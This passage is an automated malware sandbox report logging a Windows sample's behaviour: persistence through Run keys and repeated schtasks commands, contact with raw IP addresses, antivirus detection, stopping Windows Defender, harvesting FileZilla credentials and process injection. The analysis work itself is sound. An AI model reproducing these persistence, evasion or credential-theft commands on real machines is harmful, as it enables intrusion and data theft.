RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Terminates another process (8 events)

Time & API	Arguments	Status
NtTerminateProcess Nov. 3, 2023, 12:03 p.m.	status_code: 0x00000005 process_identifier: 2368 process_handle: 0x0000011c
NtTerminateProcess Nov. 3, 2023, 12:03 p.m.	status_code: 0x00000005 process_identifier: 2368 process_handle: 0x0000011c	1
NtTerminateProcess Nov. 3, 2023, 12:03 p.m.	status_code: 0x00000005 process_identifier: 2404 process_handle: 0x00000120
NtTerminateProcess Nov. 3, 2023, 12:03 p.m.	status_code: 0x00000005 process_identifier: 2404 process_handle: 0x00000120	1
NtTerminateProcess Nov. 3, 2023, 12:03 p.m.	status_code: 0x00000005 process_identifier: 2772 process_handle: 0x0000011c
NtTerminateProcess Nov. 3, 2023, 12:03 p.m.	status_code: 0x00000005 process_identifier: 2772 process_handle: 0x0000011c	1
NtTerminateProcess Nov. 3, 2023, 12:05 p.m.	status_code: 0xc0000005 process_identifier: 3228 process_handle: 0x0000000000000144
NtTerminateProcess Nov. 3, 2023, 12:05 p.m.	status_code: 0xc0000005 process_identifier: 3228 process_handle: 0x0000000000000144	1

Uses Windows utilities for basic Windows functionality (27 events)

cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\D4CF.tmp\D4E0.tmp\D4E1.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7YD3dv41.exe"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe" /tn "\WindowsAppPool\ujtOIdrpHPHQwyp"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3048 CREDAT:79894
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3048 CREDAT:145409
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe" /tn "\WindowsAppPool\1RGRO2VMheQXHJb"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe" /tn "\WindowsAppPool\HJrKFxe4WGaGi18"
cmdline	C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\F65C.tmp\F65D.tmp\F65E.bat C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6RE44dd.exe"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe" /tn "\WindowsAppPool\Rik3e2Qqnc0PuCo"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3048 CREDAT:79877
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\F65C.tmp\F65D.tmp\F65E.bat C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6RE44dd.exe"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe" /tn "\WindowsAppPool\ESPCid2h8QyYJ9b"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe" /tn "\WindowsAppPool\kKAu9cP3NNRIkrC"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe" /tn "\WindowsAppPool\1RGRO2VMheQXHJb"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3048 CREDAT:210945
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3120 CREDAT:145409
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe" /tn "\WindowsAppPool\4eOZbn8zB4sFM67"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe" /tn "\WindowsAppPool\HJrKFxe4WGaGi18"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe" /tn "\WindowsAppPool\Rik3e2Qqnc0PuCo"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://accounts.google.com/
cmdline	C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\D4CF.tmp\D4E0.tmp\D4E1.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7YD3dv41.exe"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe" /tn "\WindowsAppPool\ESPCid2h8QyYJ9b"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe" /tn "\WindowsAppPool\4eOZbn8zB4sFM67"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe" /tn "\WindowsAppPool\ujtOIdrpHPHQwyp"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe" /tn "\WindowsAppPool\kKAu9cP3NNRIkrC"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (5 events)

host	117.18.232.200
host	193.233.255.73
host	77.91.124.1
host	77.91.124.86
host	77.91.68.249

Allocates execute permission to another process indicative of possible code injection (13 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2368 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c		3221225496
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2404 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000120		3221225496
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000128	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2552 region_size: 208896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2772 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c		3221225496
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000120	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 3160 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 3264 region_size: 208896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:04 p.m.	process_identifier: 1664 region_size: 208896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:04 p.m.	process_identifier: 4136 region_size: 208896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:04 p.m.	process_identifier: 4152 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:04 p.m.	process_identifier: 1800 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:04 p.m.	process_identifier: 3496 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	1	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Nov. 3, 2023, 12:03 p.m.	service_handle: 0x006aa6f0 service_name: WinDefend control_code: 1		0	0
ControlService Nov. 3, 2023, 12:03 p.m.	service_handle: 0x006aac18 service_name: wuauserv control_code: 1		0	0

Installs itself for autorun at Windows startup (30 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP005.TMP\"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\tus.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000063051\tus.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto1661.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000064051\foto1661.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\salo.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000065051\salo.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP006.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP007.TMP\"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe" /tn "\WindowsAppPool\ujtOIdrpHPHQwyp"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe" /tn "\WindowsAppPool\1RGRO2VMheQXHJb"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe" /tn "\WindowsAppPool\HJrKFxe4WGaGi18"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe" /tn "\WindowsAppPool\Rik3e2Qqnc0PuCo"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe" /tn "\WindowsAppPool\ESPCid2h8QyYJ9b"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe" /tn "\WindowsAppPool\kKAu9cP3NNRIkrC"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe" /tn "\WindowsAppPool\1RGRO2VMheQXHJb"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe" /tn "\WindowsAppPool\4eOZbn8zB4sFM67"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe" /tn "\WindowsAppPool\HJrKFxe4WGaGi18"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe" /tn "\WindowsAppPool\Rik3e2Qqnc0PuCo"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe" /tn "\WindowsAppPool\ESPCid2h8QyYJ9b"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe" /tn "\WindowsAppPool\4eOZbn8zB4sFM67"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe" /tn "\WindowsAppPool\ujtOIdrpHPHQwyp"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe" /tn "\WindowsAppPool\kKAu9cP3NNRIkrC"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

Detects Avast Antivirus through the presence of a library (8 events)

Time & API	Arguments	Return
LdrGetDllHandle Nov. 3, 2023, 12:03 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle Nov. 3, 2023, 12:03 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle Nov. 3, 2023, 12:03 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle Nov. 3, 2023, 12:03 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle Nov. 3, 2023, 12:04 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle Nov. 3, 2023, 12:04 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle Nov. 3, 2023, 12:04 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle Nov. 3, 2023, 12:04 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0	3221225781

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Manipulates memory of a non-child process indicative of process injection (6 events)

Time & API	Arguments	Return	Repeated
Process injection	Process 2324 manipulating memory of non-child process 2368
Process injection	Process 2324 manipulating memory of non-child process 2404
Process injection	Process 2680 manipulating memory of non-child process 2772
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2368 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	3221225496	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2404 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000120	3221225496	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2772 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	3221225496	0

Potential code injection by writing to the memory of another process (33 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$þB `@ `¬BO`tA H.text# $ `.rsrc`&@@.reloc,@B base_address: 0x00400000 process_identifier: 2440 process_handle: 0x00000128	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: P8h`4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°lStringFileInfoH000004b0Comments"CompanyName6FileDescriptionoffDef0FileVersion1.0.0.06InternalNameoffDef.exeHLegalCopyrightCopyright © 2023*LegalTrademarks>OriginalFilenameoffDef.exe.ProductNameoffDef4ProductVersion1.0.0.08Assembly Version1.0.0.0¬cêï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00406000 process_identifier: 2440 process_handle: 0x00000128	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: @3 base_address: 0x00408000 process_identifier: 2440 process_handle: 0x00000128	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2440 process_handle: 0x00000128	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 2552 process_handle: 0x0000011c	1	1
